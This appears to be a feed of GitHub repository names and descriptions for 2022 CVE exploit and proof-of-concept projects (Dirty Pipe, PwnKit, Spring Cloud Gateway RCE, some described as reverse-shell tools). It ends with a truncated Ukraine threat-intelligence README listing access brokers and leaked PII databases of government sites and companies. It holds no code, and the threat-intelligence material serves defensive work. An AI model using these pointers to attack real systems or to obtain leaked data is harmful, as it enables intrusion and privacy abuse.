Script en python sobre la vulnerabilidad CVE-2021-4034 : GatoGamer1155/CVE-2021-4034 create time: 2022-03-08T20:12:38Z

CVE-2022-0847 : 4luc4rdr5290/CVE-2022-0847 create time: 2022-03-08T20:18:28Z

no description : chompie1337/Linux_LPE_io_uring_CVE-2021-41073 create time: 2022-03-02T19:07:37Z

A script to exploit CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooks : p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce create time: 2022-03-08T17:14:27Z

Bash script to check for CVE-2022-0847 "Dirty Pipe" : basharkey/CVE-2022-0847-dirty-pipe-checker create time: 2022-03-08T17:13:24Z

CVE-2022-24112: Apache APISIX Remote Code Execution Vulnerability : Mah1ndra/CVE-2022-244112 create time: 2022-03-08T17:08:52Z

Docker exploit : mrchucu1/CVE-2022-0847-Docker create time: 2022-03-08T17:02:40Z

no description : ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit create time: 2022-03-08T15:33:39Z

Implementation of Max Kellermann's exploit for CVE-2022-0847 : 0xIronGoat/dirty-pipe create time: 2022-03-08T15:30:45Z

no description : puckiestyle/CVE-2022-0847 create time: 2022-03-08T14:46:21Z

The Dirty Pipe Vulnerability : knqyf263/CVE-2022-0847 create time: 2022-03-08T13:48:55Z

CVE-2022-25943 : HadiMed/KINGSOFT-WPS-Office-LPE create time: 2021-07-09T23:34:57Z

CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability : ahrixia/CVE_2022_0847 create time: 2022-03-08T12:43:43Z

CVE-2022-0847 DirtyPipe Exploit. : febinrev/dirtypipez-exploit create time: 2022-03-08T11:49:40Z

An exploit for CVE-2022-0847 dirty-pipe vulnerability : cspshivam/CVE-2022-0847-dirty-pipe-exploit create time: 2022-03-08T10:40:07Z

调试代码包含断点信息,直接导入即可进行调试 : ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code create time: 2022-03-08T10:07:54Z

CVE-2022-22947_EXP,CVE-2022-22947_RCE,CVE-2022-22947反弹shell,CVE-2022-22947 getshell : aodsec/CVE-2022-22947 create time: 2022-03-08T09:32:36Z

no description : zhangweijie11/CVE-2020-17519 create time: 2022-03-08T09:19:27Z

Linux Kernel Local Privilege Escalation Vulnerability CVE-2022-0847. : antx-code/CVE-2022-0847 create time: 2022-03-08T09:10:51Z

A python implementation of the Dirty Pipe exploit that adds an unprivliged user to the sudoers group. : eremus-dev/CVE-2016-5195-sudo-poc create time: 2022-03-08T07:17:39Z

CVE-2022-0487 : si1ent-le/CVE-2022-0847 create time: 2022-03-08T04:51:02Z

Script en python de la vulnerabilidad CVE-2021-4034 : GatoGamer1155/CVE-2021-4034 create time: 2022-03-08T03:55:05Z

no description : rahul1406/cve-2022-0847dirtypipe-exploit create time: 2022-03-08T03:56:03Z

Script en python de la vulnerabilidad CVE-2021-4034 : GatoGamer1155/CVE-2021-4034 create time: 2022-03-08T02:05:43Z

CVE-2022-24990:TerraMaster TOS 通过 PHP 对象实例化执行未经身份验证的远程命令 : Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP- create time: 2022-03-08T01:28:32Z

no description : lucksec/CVE-2022-0847 create time: 2022-03-08T01:17:09Z

CVE-2022-0847 exploit one liner : carlosevieira/Dirty-Pipe create time: 2022-03-07T20:57:34Z

66666 : 2xYuan/CVE-2022-0847 create time: 2022-03-07T19:56:37Z

CVE-2022-21907: exploitation with Powershell, Python, Ruby, NMAP and Metasploit. : mauricelambert/CVE-2021-31166 create time: 2022-03-07T18:56:52Z

A root exploit for CVE-2022-0847 : Arinerron/CVE-2022-0847-DirtyPipe-Exploit create time: 2022-03-07T18:55:20Z

CVE-2022-0847简单复现 : imfiver/CVE-2022-0847 create time: 2022-03-07T18:36:50Z

Script CVE-2021-4034 en python : GatoGamer1155/CVE-2021-4034 create time: 2022-03-07T15:10:32Z

Vulnerability in the Linux kernel since 5.8 : xndpxs/CVE-2022-0847 create time: 2022-03-07T17:51:02Z

Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947) : mrknow001/CVE-2022-22947 create time: 2022-03-07T16:24:42Z

CVE-2022-0847 : bbaranoff/CVE-2022-0847 create time: 2022-03-07T15:50:18Z

PoC for CVE-2022-23940 : manuelz120/CVE-2022-23940 create time: 2022-03-06T17:05:02Z

no description : darkb1rd/cve-2022-22947 create time: 2022-03-07T15:12:45Z

This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes. : Udyz/CVE-2022-0847 create time: 2022-03-07T14:31:38Z

CVE-2022-25636 : Bonfee/CVE-2022-25636 create time: 2022-03-07T13:38:41Z

SpringCloudGatewayRCE / Code By:Jun_sheng : Jun-5heng/CVE-2022-22947 create time: 2022-03-07T11:53:51Z

no description : RobertDra/CVE-2022-25257 create time: 2022-03-07T10:19:20Z

no description : RobertDra/CVE-2022-25256 create time: 2022-03-07T10:18:41Z

no description : puckiestyle/CVE-2022-0492 create time: 2022-03-07T10:03:17Z

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)批量检测工具 : YutuSec/SpEL create time: 2022-03-07T09:14:50Z

Spring Cloud Gateway远程代码执行漏洞POC,基于命令执行的基础上,增加了反弹shell操作 : j-jasson/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE create time: 2022-03-07T07:24:13Z

It is a simple script coded in bash scripting to exploit the PwnKit vulnerability (cve-2021-4034), the idea of this is to try to automate the exploitation of this vulnerability as much as possible. : T369-Real/pwnkit-pwn create time: 2022-03-05T19:49:52Z

PoC for CVE-2020-0601 - CryptoAPI exploit : ioncodes/Curveball create time: 2020-01-28T21:24:54Z

A script to check if a container environment is vulnerable to container escapes via CVE-2022-0492 : SofianeHamlaoui/CVE-2022-0492-Checker create time: 2022-03-06T10:57:09Z

no description : Onurhan1337/CVE-2018-10933 create time: 2022-03-06T07:43:02Z

Webmin CVE-2022-0824 Reverse Shell : faisalfs10x/Webmin-CVE-2022-0824-revshell create time: 2022-03-06T00:03:31Z

CVE-2022-23779: Internal Hostname Disclosure Vulnerability : fbusr/CVE-2022-23779 create time: 2022-03-05T21:01:13Z

CVE-2021-32099 : akr3ch/CVE-2021-32099 create time: 2022-03-05T08:53:45Z

no description : 22ke/CVE-2022-22947 create time: 2022-03-05T06:19:46Z

[Django]CVE-2017-1279475 : thebatmanfuture/-Django-CVE-2017-1279475 create time: 2022-03-05T02:00:43Z

Spring Cloud Gateway Actuator API SpEL Code Injection. : march0s1as/CVE-2022-22947 create time: 2022-03-04T18:37:57Z

no description : gerr-re/cve-2022-24644 create time: 2022-03-04T18:26:35Z

CVE-2019-11043 LAB : jas9reet/CVE-2019-11043 create time: 2022-03-04T16:25:16Z

I am not the real author of this exploits.. There are two exploits available, use any of one if it doesn't work use another one... Manual for this two exploit has given in README file. Please read that file before using it.. :) : PentesterSoham/CVE-2021-4034-exploit create time: 2022-03-04T15:41:12Z

Proof of concept for pwnkit vulnerability : PwnFunction/CVE-2021-4034 create time: 2022-01-27T14:43:57Z

批量url检测Spring-Cloud-Gateway-CVE-2022-22947 : Xd-tl/CVE-2022-22947-Rce_POC create time: 2022-03-04T14:58:02Z

no description : puckiestyle/CVE-2021-3156 create time: 2022-03-04T13:06:51Z

CVE-2022-22947批量检测脚本,回显命令没进行正则,大佬们先用着,后续再更 : chaosec2021/CVE-2022-22947-POC create time: 2022-03-04T11:31:00Z

Spring-Cloud-Gateway-CVE-2022-22947 : nu0l/cve-2022-22947 create time: 2022-03-04T10:10:12Z

Spring Cloud Gateway Actuator API 远程命令执行 CVE-2022-22947 : dbgee/CVE-2022-22947 create time: 2022-03-04T09:47:55Z

​logo​ ​#​ ​Ukraine-Cyber-Operations ​Curated Intelligence is working with analysts from around the world to provide useful information to organisations in Ukraine looking for additional free threat intelligence. Slava Ukraini. Glory to Ukraine. (​Blog​ | ​Twitter​ | ​LinkedIn​) ​​timeline​​cyberwar​ ​###​ ​Analyst Comments: ​-​ 2022-02-25 ​  ​-​ Creation of the initial repository to help organisations in Ukraine ​  ​-​ Added ​Threat Reports​ section ​  ​-​ Added ​Vendor Support​ section ​-​ 2022-02-26 ​  ​-​ Additional resources, chronologically ordered (h/t Orange-CD) ​  ​-​ Added ​Vetted OSINT Sources​ section  ​  ​-​ Added ​Miscellaneous Resources​ section ​-​ 2022-02-27 ​  ​-​ Additional threat reports have been added ​  ​-​ Added ​Data Brokers​ section ​  ​-​ Added ​Access Brokers​ section ​-​ 2022-02-28 ​  ​-​ Added Russian Cyber Operations Against Ukraine Timeline by ETAC ​  ​-​ Added Vetted and Contextualized ​Indicators of Compromise (IOCs)​ by ETAC ​-​ 2022-03-01 ​  ​-​ Additional threat reports and resources have been added ​-​ 2022-03-02 ​  ​-​ Additional ​Indicators of Compromise (IOCs)​ have been added ​  ​-​ Added vetted ​YARA rule collection​ from the Threat Reports by ETAC ​  ​-​ Added loosely-vetted ​IOC Threat Hunt Feeds​ by KPMG-Egyde CTI (h/t ​0xDISREL​) ​    ​-​ IOCs shared by these feeds are ​LOW-TO-MEDIUM CONFIDENCE​ we strongly recommend NOT adding them to a blocklist ​    ​-​ These could potentially be used for ​THREAT HUNTING​ and could be added to a ​WATCHLIST ​    ​-​ IOCs are generated in ​MISP COMPATIBLE​ CSV format ​-​ 2022-03-03 ​  ​-​ Additional threat reports and vendor support resources have been added ​  ​-​ Updated ​Log4Shell IOC Threat Hunt Feeds​ by KPMG-Egyde CTI; not directly related to Ukraine, but still a widespread vulnerability. ​  ​-​ Added diagram of Russia-Ukraine Cyberwar Participants 2022 by ETAC ​  ​-​ Additional ​Indicators of Compromise (IOCs)​ have been added ​####​ ​Threat Reports ​| Date | Source | Threat(s) | URL | ​| --- | --- | --- | --- | ​| 14 JAN | SSU Ukraine | Website Defacements | ssu.gov.ua| ​| 15 JAN | Microsoft | WhisperGate wiper (DEV-0586) | microsoft.com | ​| 19 JAN | Elastic | WhisperGate wiper (Operation BleedingBear) | elastic.github.io | ​| 31 JAN | Symantec | Gamaredon/Shuckworm/PrimitiveBear (FSB) | symantec-enterprise-blogs.security.com | ​| 2 FEB | RaidForums | Access broker "GodLevel" offering Ukrainain algricultural exchange | RaidForums [not linked] | ​| 2 FEB | CERT-UA | UAC-0056 using SaintBot and OutSteel malware | cert.gov.ua | ​| 3 FEB | PAN Unit42 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | unit42.paloaltonetworks.com | ​| 4 FEB | Microsoft | Gamaredon/Shuckworm/PrimitiveBear (FSB) | microsoft.com | ​| 8 FEB | NSFOCUS | Lorec53 (aka UAC-0056, EmberBear, BleedingBear) | nsfocusglobal.com | ​| 15 FEB | CERT-UA | DDoS attacks against the name server of government websites as well as Oschadbank (State Savings Bank) & Privatbank (largest commercial bank). False SMS and e-mails to create panic | cert.gov.ua | ​| 23 FEB | The Daily Beast | Ukrainian troops receive threatening SMS messages | thedailybeast.com | ​| 23 FEB | UK NCSC | Sandworm/VoodooBear (GRU) | ncsc.gov.uk | ​| 23 FEB | SentinelLabs | HermeticWiper | sentinelone.com | ​| 24 FEB | ESET | HermeticWiper | welivesecurity.com | ​| 24 FEB | Symantec | HermeticWiper, PartyTicket ransomware, CVE-2021-1636, unknown webshell | symantec-enterprise-blogs.security.com | ​| 24 FEB | Cisco Talos | HermeticWiper | blog.talosintelligence.com | ​| 24 FEB | Zscaler | HermeticWiper | zscaler.com | ​| 24 FEB | Cluster25 | HermeticWiper | cluster25.io | ​| 24 FEB | CronUp | Data broker "FreeCivilian" offering multiple .gov.ua | twitter.com/1ZRR4H| ​| 24 FEB | RaidForums | Data broker "Featherine" offering diia.gov.ua | RaidForums [not linked] | ​| 24 FEB | DomainTools | Unknown scammers | twitter.com/SecuritySnacks | ​| 25 FEB | @500mk500 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | twitter.com/500mk500 | ​| 25 FEB | @500mk500 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | twitter.com/500mk500| ​| 25 FEB | Microsoft | HermeticWiper | gist.github.com | ​| 25 FEB | 360 NetLab | DDoS (Mirai, Gafgyt, IRCbot, Ripprbot, Moobot) | blog.netlab.360.com | ​| 25 FEB | Conti [themselves] | Conti ransomware, BazarLoader | Conti News .onion [not linked] | ​| 25 FEB | CoomingProject [themselves] | Data Hostage Group | CoomingProject Telegram [not linked] | ​| 25 FEB | CERT-UA | UNC1151/Ghostwriter (Belarus MoD) | CERT-UA Facebook| ​| 25 FEB | Sekoia | UNC1151/Ghostwriter (Belarus MoD) | twitter.com/sekoia_io | ​| 25 FEB | @jaimeblascob | UNC1151/Ghostwriter (Belarus MoD) | twitter.com/jaimeblasco| ​| 25 FEB | RISKIQ | UNC1151/Ghostwriter (Belarus MoD) | community.riskiq.com | ​| 25 FEB | MalwareHunterTeam | Unknown phishing | twitter.com/malwrhunterteam | ​| 25 FEB | ESET | Unknown scammers | twitter.com/ESETresearch | ​| 25 FEB | BitDefender | Unknown scammers | blog.bitdefender.com | ​| 25 FEB | SSSCIP Ukraine | Unkown phishing | twitter.com/dsszzi | ​| 25 FEB | RaidForums | Data broker "NetSec"  offering FSB (likely SMTP accounts) | RaidForums [not linked] | ​| 25 FEB | Zscaler | PartyTicket decoy ransomware | zscaler.com | ​| 25 FEB | INCERT GIE | Cyclops Blink, HermeticWiper | linkedin.com [Login Required] | ​| 25 FEB | Proofpoint | UNC1151/Ghostwriter (Belarus MoD) | twitter.com/threatinsight | ​| 25 FEB | @fr0gger_ | HermeticWiper capabilities Overview | twitter.com/fr0gger_ ​| 26 FEB | BBC Journalist | A fake Telegram account claiming to be President Zelensky is posting dubious messages | twitter.com/shayan86 | ​| 26 FEB | CERT-UA | UNC1151/Ghostwriter (Belarus MoD) | CERT_UA Facebook | ​| 26 FEB | MHT and TRMLabs | Unknown scammers, linked to ransomware | twitter.com/joes_mcgill | ​| 26 FEB | US CISA | WhisperGate wiper, HermeticWiper | cisa.gov | ​| 26 FEB | Bloomberg | Destructive malware (possibly HermeticWiper) deployed at Ukrainian Ministry of Internal Affairs & data stolen from Ukrainian telecommunications networks | bloomberg.com | ​| 26 FEB | Vice Prime Minister of Ukraine | IT ARMY of Ukraine created to crowdsource offensive operations against Russian infrastructure | twitter.com/FedorovMykhailo | ​| 26 FEB | Yoroi | HermeticWiper | yoroi.company | ​| 27 FEB | LockBit [themselves] | LockBit ransomware | LockBit .onion [not linked] |  ​| 27 FEB | ALPHV [themselves] | ALPHV ransomware | vHUMINT [closed source] | ​| 27 FEB | Mēris Botnet [themselves] | DDoS attacks | vHUMINT [closed source] | ​| 28 FEB | Horizon News [themselves] | Leak of China's Censorship Order about Ukraine | TechARP| ​| 28 FEB | Microsoft | FoxBlade (aka HermeticWiper) | Microsoft | ​| 28 FEB | @heymingwei | Potential BGP hijacks attempts against Ukrainian Internet Names Center | https://twitter.com/heymingwei | ​| 28 FEB | @cyberknow20 | Stormous ransomware targets Ukraine Ministry of Foreign Affairs | twitter.com/cyberknow20 |  ​| 1 MAR | ESET | IsaacWiper and HermeticWizard | welivesecurity.com | ​| 1 MAR | Proofpoint | Ukrainian armed service member's email compromised and sent malspam containing the SunSeed malware (likely TA445/UNC1151/Ghostwriter) | proofpoint.com | ​| 1 MAR | Elastic | HermeticWiper | elastic.github.io | ​| 1 MAR | CrowdStrike | PartyTicket (aka HermeticRansom), DriveSlayer (aka HermeticWiper) | CrowdStrike | ​| 2 MAR | Zscaler | DanaBot operators launch DDoS attacks against the Ukrainian Ministry of Defense | zscaler.com | ​| 3 MAR | @ShadowChasing1 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | twitter.com/ShadowChasing1 | ​| 3 MAR | @vxunderground | News website in Poland was reportedly compromised and the threat actor uploaded anti-Ukrainian propaganda | twitter.com/vxunderground | ​| 3 MAR | @kylaintheburgh | Russian botnet on Twitter is pushing "#istandwithputin" and "#istandwithrussia" propaganda (in English) | twitter.com/kylaintheburgh | ​| 3 MAR | @tracerspiff | UNC1151/Ghostwriter (Belarus MoD) | twitter.com | ​####​ ​Access Brokers ​| Date | Threat(s) | Source | ​| --- | --- | --- | ​| 23 JAN | Access broker "Mont4na" offering UkrFerry | RaidForums [not linked] | ​| 23 JAN | Access broker "Mont4na" offering PrivatBank | RaidForums [not linked] | ​| 24 JAN | Access broker "Mont4na" offering DTEK | RaidForums [not linked] | ​| 27 FEB | KelvinSecurity Sharing list of IP cameras in Ukraine | vHUMINT [closed source] | ​| 28 FEB | "w1nte4mute" looking to buy access to UA and NATO countries (likely ransomware affiliate) | vHUMINT [closed source] | ​####​ ​Data Brokers ​| Threat Actor    | Type            | Observation                                                                                               | Validated | Relevance                     | Source                                                     | ​| --------------- | --------------- | --------------------------------------------------------------------------------------------------------- | --------- | ----------------------------- | ---------------------------------------------------------- | ​| aguyinachair    | UA data sharing | PII DB of ukraine.com (shared as part of a generic compilation)                                           | No        | TA discussion in past 90 days | ELeaks Forum [not linked]                                | ​| an3key          | UA data sharing | DB of Ministry of Communities and Territories Development of Ukraine (minregion[.]gov[.]ua)           | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| an3key          | UA data sharing | DB of Ukrainian Ministry of Internal Affairs (wanted[.]mvs[.]gov[.]ua)                              | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | PII DB (40M) of PrivatBank customers (privatbank[.]ua)                                                  | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | DB of "border crossing" DBs of DPR and LPR                                                                | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | PII DB (7.5M) of Ukrainian passports                                                                      | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | PII DB of Ukrainian car registration, license plates, Ukrainian traffic police records                    | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | PII DB (2.1M) of Ukrainian citizens                                                                       | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | PII DB (28M) of Ukrainian citizens (passports, drivers licenses, photos)                                  | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | PII DB (1M) of Ukrainian postal/courier service customers (novaposhta[.]ua)                             | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | PII DB (10M) of Ukrainian telecom customers (vodafone[.]ua)                                             | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | PII DB (3M) of Ukrainian telecom customers (lifecell[.]ua)                                              | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| CorelDraw       | UA data sharing | PII DB (13M) of Ukrainian telecom customers (kyivstar[.]ua)                                             | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| danieltx51      | UA data sharing | DB of Ministry of Foreign Affairs of Ukraine (mfa[.]gov[.]ua)                                         | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| DueDiligenceCIS | UA data sharing | PII DB (63M) of Ukrainian citizens (name, DOB, birth country, phone, TIN, passport, family, etc)          | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| Featherine      | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine              | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| FreeCivilian    | UA data sharing | DB of Ministry for Internal Affairs of Ukraine public data search engine (wanted[.]mvs[.]gov[.]ua)  | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| FreeCivilian    | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion[.]gov[.]ua)          | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| FreeCivilian    | UA data sharing | DB of Motor Insurance Bureau of Ukraine (mtsbu[.]ua)                                                    | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| FreeCivilian    | UA data sharing | PII DB of Ukrainian digital-medicine provider (medstar[.]ua)                                            | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| FreeCivilian    | UA data sharing | DB of ticket.kyivcity.gov.ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of id.kyivcity.gov.ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of my.kyivcity.gov.ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of portal.kyivcity.gov.ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of anti-violence-map.msp.gov.ua                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of dopomoga.msp.gov.ua                                                                                 | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of e-services.msp.gov.ua                                                                               | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of edu.msp.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of education.msp.gov.ua                                                                                | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of ek-cbi.msp.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mail.msp.gov.ua                                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of portal-gromady.msp.gov.ua                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of web-minsoc.msp.gov.ua                                                                               | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of wcs-wim.dsbt.gov.ua                                                                                 | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of bdr.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of motorsich.com                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of dsns.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mon.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of minagro.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of zt.gov.ua                                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of kmu.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mvs.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of dsbt.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of forest.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of nkrzi.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of dabi.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of comin.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of dp.dpss.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of esbu.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mms.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mova.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mspu.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of nads.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of reintegration.gov.ua                                                                                | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of sies.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of sport.gov.ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mepr.gov.ua                                                                                         | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mfa.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of va.gov.ua                                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mtu.gov.ua                                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of cg.mvs.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of ch-tmo.mvs.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of cp.mvs.gov.ua                                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of cpd.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of hutirvilnij-mrc.mvs.gov.ua                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of dndekc.mvs.gov.ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of visnyk.dndekc.mvs.gov.ua                                                                            | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of dpvs.hsc.gov.ua                                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of odk.mvs.gov.ua                                                                                      | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of e-driver[.]hsc[.]gov[.]ua                                                                     | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of wanted[.]mvs[.]gov[.]ua                                                                       | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of minregeion[.]gov[.]ua                                                                           | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of health[.]mia[.]solutions                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mtsbu[.]ua                                                                                        | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of motorsich[.]com                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of kyivcity[.]com                                                                                    | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of bdr[.]mvs[.]gov[.]ua                                                                          | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of gkh[.]in[.]ua                                                                                   | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of kmu[.]gov[.]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mon[.]gov[.]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of minagro[.]gov[.]ua                                                                              | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| FreeCivilian    | UA data sharing | DB of mfa[.]gov[.]ua                                                                                  | No        | TA discussion in past 90 days | FreeCivilian .onion [not linked]                         | ​| Intel_Data     | UA data sharing | PII DB (56M) of Ukrainian Citizens                                                                        | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| Kristina        | UA data sharing | DB of Ukrainian National Police 